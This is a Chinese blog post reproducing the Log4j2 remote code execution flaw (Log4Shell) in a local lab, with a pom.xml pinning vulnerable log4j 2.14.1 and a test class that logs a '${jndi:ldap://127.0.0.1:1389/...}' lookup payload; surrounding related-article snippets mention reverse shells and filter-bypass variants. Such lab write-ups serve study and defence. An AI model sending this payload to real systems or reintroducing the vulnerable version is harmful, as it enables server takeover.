Apache Log4j2远程代码执行漏洞

最新推荐文章于 2025-03-31 20:48:17 发布
最新推荐文章于 2025-03-31 20:48:17 发布
阅读量1k 收藏 3
点赞数 1
文章标签: apache 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44522540/article/details/121857390
版权

漏洞介绍

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。

此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行

影响版本

Apache Log4j 2.x <= 2.14.1

漏洞复现

在IDEA中新建一个Maven项目,在pom.xml中导入依赖文件下载log4j程序包

pom.xml文件如下:

<dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

下载相应程序包资源
在这里插入图片描述
使用JNDI注入工具开启rmi服务或者idap服务执行本地命令
在这里插入图片描述
测试Demo

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class Test {
    private static final Logger logger = LogManager.getLogger(Test.class);

    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/2ltqyh}");
    }
}

在这里插入图片描述

hana-u
关注
java.lang.NoSuchMethodError: org.apache.log4j.Logger.trace(Ljava/lang/Object;)V 问题处理
山巅
12-08 1358
类冲突处理
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1230
以及 LDAP即轻量级目录访问协议都是名称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户名、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在名称服务中根据打印机名称获取打印机对象,并进行打印操作。
springboot启动报错
aaaaaaaaaaaaam的博客
06-26 311
Log4j2 could not find a logging implementation 添加maven依赖 org.apache.logging.log4j log4j-core 2.10.0 org.apache.logging.log4j log4j-api 2.10.0
Apache Log4j2 远程代码执行(CVE-2021-44228)
最新发布
2303_76157831的博客
03-31 1617
Apache Log4j2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。
java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atTrace()Lorg/apache/logging/log4j/LogB
qq_38978882的博客
07-28 2672
使用poi-ooxml报java.lang.NoSuchMethodError
java.lang.NoClassDefFoundError: org/apache/commons/io/output/UnsynchronizedByteArrayOutputStream
qq_34254090的博客
01-25 1万+
java.lang.NoClassDefFoundError: org/apache/commons/io/output/UnsynchronizedByteArrayOutputStream 文件输出时报出异常,如下: java.lang.NoClassDefFoundError: org/apache/commons/io/output/UnsynchronizedByteArrayOutputStream at com.primeton.das.common.util.PoiExcelUtils.w
Spring问题:java.lang.ClassNotFoundException: org.apache.http.pool.AbstractConnPool$4
xinyuan2018的博客
03-22 8360
org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'indexService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 2023
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 1万+
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogB
qq_25775675的博客
08-31 1万+
Exception in thread "main" java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogBuilder;
java.lang.NoSuchMethodError: org.apache.log4j.Category.log
gris的专栏
01-13 7868
<br /> 启动tomcat时报错:java.lang.NoSuchMethodError: org.apache.log4j.Category.log(Ljava/lang/String;Lorg/apache/log4j/Level;Ljava/lang/Object;Ljava/lang/Throwable;)V at org.apache.commons.logging.impl.Log4JCategoryLog.error(Log4JCategoryLog.java:149)开始一直以为是
java.lang.NoSuchMethodError: org.apache.log4j.Logger.isTraceEnabled()Z错误
璐璐的专栏
06-06 1万+
008-8-21 13:22:26 org.apache.catalina.core.StandardWrapperValve invoke 严重: Servlet.service() for servlet jsp threw exception java.lang.NoSuchMethodError: org.apache.log4j.Logger.isTraceEnabled()Z
Log4j漏洞修复方案
一颗学徒
12-13 4860
Log4j漏洞修复方案
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Log4j 严重漏洞修最新修复方案参考
AK774S的博客
05-10 915
缓解方式1:接入安全产品 ============ 第一时间上WAF规则、RASP拦截等措施,给修复争取时间。 但是也要注意一些静态规则上的绕过,log4j 支持的写法比较多,有非常多绕过姿势。比如: KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:j}upper:n{upper:n}upper:n{lower:d}upper:i:{upper:i}:upper:i:{lower:r}m${lower:i}}😕 《一线.
poi-解决NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogBuild
小蜗牛的博客
11-03 772
poi-解决NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogBuild
log4j的jar包版本冲突导致的NoSuchMethodError解决方案
mrleeapple的专栏
09-15 1万+
引入操作Excel文件的poi这个jar包,版本5.2.2,报错: Exception in thread "main" java.lang.NoSuchMethodError: org.apache.logging.log4j.Logger.atDebug()Lorg/apache/logging/log4j/LogBuilder
Apache Log4j2远程代码执行漏洞的快速检测工具
资源摘要信息:"本资源是一个针对Apache Log4j2远程代码执行漏洞的专门检测工具。该漏洞2021年底被披露,影响了全球范围内的大量Java应用程序,因为Log4j2是广泛使用的一个日志记录库。该工具分为适用于Windows操作...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值